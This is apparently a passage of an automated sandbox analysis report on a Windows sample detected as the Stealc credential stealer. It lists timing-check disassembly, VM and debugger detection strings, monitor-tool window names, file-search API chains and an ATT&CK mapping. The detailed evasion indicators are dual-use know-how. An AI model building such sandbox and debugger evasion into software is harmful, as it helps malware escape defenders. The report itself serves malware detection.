Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA6B6 second address: 11EA6C2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jl 00007FBF09325AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA839 second address: 11EA83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ECF55 second address: 11ECF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA652 second address: 11FA666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D33350h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA666 second address: 11FA672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA672 second address: 11FA676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA676 second address: 11FA6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FBF09325AC9h 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA6A6 second address: 11FA6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA6AD second address: 11FA6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA6B3 second address: 11FA6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF08D3334Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FCCB3 second address: 11FCCBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FCCBF second address: 11FCCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FC878 second address: 11FC887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FBF09325AB8h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FC887 second address: 11FC89E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Dh 0x00000007 jnl 00007FBF08D3334Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1202620 second address: 1202624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1202624 second address: 120262A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1214961 second address: 1214965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1214965 second address: 1214977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121360E second address: 1213621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF09325ABCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1213770 second address: 121378C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D33355h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121378C second address: 12137C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FBF09325AC6h 0x00000011 pop edx 0x00000012 push eax 0x00000013 jmp 00007FBF09325AC0h 0x00000018 jbe 00007FBF09325AB6h 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1213A61 second address: 1213A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1213A70 second address: 1213A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1213A75 second address: 1213A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1218727 second address: 121872B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12182CF second address: 12182D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121843B second address: 1218469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325AC2h 0x00000007 jmp 00007FBF09325AC5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1221ED2 second address: 1221ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1221ED7 second address: 1221EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1221EDD second address: 1221EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF08D33356h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1221EFB second address: 1221F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF09325AB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12349BC second address: 12349C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12349C4 second address: 12349CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124485B second address: 1244868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1244868 second address: 1244881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF09325AC1h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1243744 second address: 124377F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007FBF08D33346h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jmp 00007FBF08D33354h 0x00000014 pushad 0x00000015 je 00007FBF08D33346h 0x0000001b jnl 00007FBF08D33346h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jnl 00007FBF08D33346h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124377F second address: 124378C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF09325AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1243D47 second address: 1243D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1244195 second address: 124419C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124419C second address: 12441AE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF08D3334Ch 0x00000008 jl 00007FBF08D33346h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12441AE second address: 12441BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FBF09325ABEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12442F4 second address: 1244302 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FBF08D3334Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1244302 second address: 124430E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245F36 second address: 1245F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF08D3334Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245F45 second address: 1245F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A67C second address: 124A6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jns 00007FBF08D33346h 0x00000014 jng 00007FBF08D33346h 0x0000001a popad 0x0000001b jmp 00007FBF08D33355h 0x00000020 popad 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A6B6 second address: 124A6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D0502 second address: 52D0543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF08D3334Ah 0x00000009 popad 0x0000000a pushfd 0x0000000b jmp 00007FBF08D33352h 0x00000010 and ecx, 2B690F98h 0x00000016 jmp 00007FBF08D3334Bh 0x0000001b popfd 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f mov cx, dx 0x00000022 push eax 0x00000023 push edx 0x00000024 mov edi, 712ECF74h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D0543 second address: 52D0551 instructions: 0x00000000 rdtsc 0x00000002 mov ah, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D0551 second address: 52D056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF08D33355h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D056A second address: 52D056E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D056E second address: 52D058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FBF08D3334Dh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D058C second address: 52D0590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D0590 second address: 52D0594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D0594 second address: 52D059A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116E87F second address: 116E885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FBB28E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FBDC01 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11F1E6D instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

graph_0-39155

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00CE40F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00CDE530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00CE47C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00CDF7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00CD1710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00CDDB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00CE4B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00CE3B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00CDBE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00CDEE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00CDDF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CD1160 GetSystemInfo,ExitProcess,

0_2_00CD1160

Source: file.exe, file.exe, 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2091636092.00000000015C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091636092.00000000015F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37967
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37970
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37987
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37982
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-38022
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37856

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CD4610 VirtualProtect ?,00000004,00000100,00000000

0_2_00CD4610

Source: C:\Users\user\Desktop\file.exe

0_2_00CE9BB0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE9AA0 mov eax, dword ptr fs:[00000030h]

0_2_00CE9AA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00CE7690

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5952, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00CE9790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_00CE98E0

Source: file.exe, file.exe, 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: QProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D17588 cpuid

0_2_00D17588

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00CE7D20

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00CE6BC0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00CE79E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00CE7BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2037496917.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2037496917.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	33 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	33 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	13 Process Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
